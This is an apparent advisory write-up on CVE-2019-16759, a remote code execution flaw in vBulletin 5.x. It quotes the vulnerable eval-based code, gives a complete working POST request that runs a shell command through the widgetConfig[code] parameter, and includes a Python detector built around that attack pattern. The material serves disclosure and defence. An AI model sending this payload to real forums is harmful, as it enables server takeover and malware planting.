Tens of Thousands of vBulletin Forums Widely Being Exploited (CVE-2019-16759)

A critical remote code execution (RCE) vulnerability affecting vBulletin, one of the most widely used internet forum software packages, has been publicly disclosed. The vulnerability is identified as CVE-2019-16759 and allows an attacker to execute arbitrary commands on the website, such as uploading malware, uploading web shells or tampering with the website’s code. This vulnerability is believed to have been known, used and sold by researchers and attackers for years.


Technical Details:

The vulnerability resides in the way the PHP widget file of the vBulletin forum software package accepts configuration via URL parameters and then parses it on the server without proper safety checks. vBulletin’s PHP widgets are rendered at run-time and are used to create dynamic widgets without having to directly access the hosting server. An attacker can force the website to render arbitrary widgets using the ajax/render/widget_php route and execute arbitrary code. Below are the contents of the file ajax/render/widget_php.


<div class="widget-content">
<vb:if condition="!empty($widgetConfig['code']) AND
!$vboptions['disable_php_rendering']">
{vb:action evaledPHP, bbcode, evalCode, {vb:raw widgetConfig.code}}
{vb:raw $evaledPHP}
<vb:else />
<vb:if condition="$user['can_use_sitebuilder']">
<span class="note">{vb:phrase click_edit_to_config_module}</span>
</vb:if>
</vb:if>
</div>

The vb:action in the template above calls the evalCode function, which executes whatever PHP is passed in its $code argument. This can be used to run any command available on the system, open firewall ports, or download and execute files and scripts. The function evalCode is found in includes/vb5/frontend/controller/bbcode.php.


// found in: public_html/includes/vb5/frontend/controller/bbcode.php
function evalCode($code)
{
    ob_start();
    // $code is taken straight from widgetConfig[code] in the request;
    // nothing validates or restricts it before it is handed to eval()
    eval($code);
    $output = ob_get_contents();
    ob_end_clean();
    return $output;
}

A typical POST request executing the ‘id’ command on a vulnerable vBulletin installation could be:

POST / HTTP/1.1
Host: 192.168.1.12
Content-Length: 108
Content-Type: application/x-www-form-urlencoded

routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27id%27%29%3B+exit%3B

On receiving this request, the server forwards the “id” command to the evalCode function and returns its output to the client. Manipulation of the widgetConfig[code] argument as a request parameter thus leads to command execution.
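As an added example for defenders (not code from the original post or from vBulletin), the following Python check decodes a request's query string and form body and flags the pattern described above: the ajax/render/widget_php route combined with a widgetConfig[code] parameter. The sample requests are constructed for the example; the first mirrors the POST shown above.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample traffic: (method, path, form body). The first entry mirrors
# the POST shown in the write-up, the second is the same parameters sent as a
# GET query string, the third is a benign widget render.
SAMPLE_REQUESTS = [
    ("POST", "/", "routestring=ajax%2Frender%2Fwidget_php"
                  "&widgetConfig%5Bcode%5D=echo+shell_exec%28%27id%27%29%3B+exit%3B"),
    ("GET", "/?routestring=ajax/render/widget_php&widgetConfig[code]=phpinfo();", ""),
    ("POST", "/", "routestring=ajax%2Frender%2Fwidget_tabbedcontainer_tab_panel&pageid=1"),
]


def extract_params(path, body):
    """Merge query-string and form-body parameters into one dict of lists.

    Both locations are checked because the widget configuration is read from
    request parameters regardless of where they are carried. parse_qs
    percent-decodes keys, so widgetConfig%5Bcode%5D becomes widgetConfig[code].
    Keys are lowercased so casing tricks do not hide the parameter name.
    """
    params = {}
    for source in (urlsplit(path).query, body):
        for key, values in parse_qs(source, keep_blank_values=True).items():
            params.setdefault(key.lower(), []).extend(values)
    return params


def is_widget_php_rce_attempt(method, path, body):
    """True when the request targets the widget_php route and carries code.

    The route check tolerates a leading slash and casing differences; the
    parameter check looks for widgetConfig[code] itself, not its contents,
    so obfuscated payloads are still caught.
    """
    params = extract_params(path, body)
    route = " ".join(params.get("routestring", [])).strip("/").lower()
    has_code = "widgetconfig[code]" in params
    return route.endswith("ajax/render/widget_php") and has_code


def scan(requests):
    """Return the indexes of requests that match the CVE-2019-16759 pattern."""
    return [i for i, req in enumerate(requests) if is_widget_php_rce_attempt(*req)]
```

Because the exploit travels in the POST body, this check must run where the body is visible (a WAF, reverse proxy, or full request capture), not over ordinary access logs that record only the URL.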

Publicly available PoC:

Proof-of-concept code is publicly available for this vulnerability. Since the release of the PoC, the vulnerability has been widely exploited, and many users have reported attacks on their forums using it. A botnet has also been reported to use this vBulletin exploit to secure vulnerable servers so that they cannot be used by other attackers: it breaks into a vulnerable server with the exploit and then modifies the evalCode function in the source file so that it requires a password before executing commands.

Thousands of websites use this forum software, including those of organizations such as Pearl Jam, NASA, EA, STEAM, Houston Texans, Sony Pictures, Zynga, and more.


Affected Versions:

All vBulletin forum versions 5.x through 5.5.4 are affected.


Impact:

This vulnerability allows an attacker to execute arbitrary code on the affected system.


Solution:

An official patch has been released by vBulletin. Apply the latest security patches, available for download from the vendor.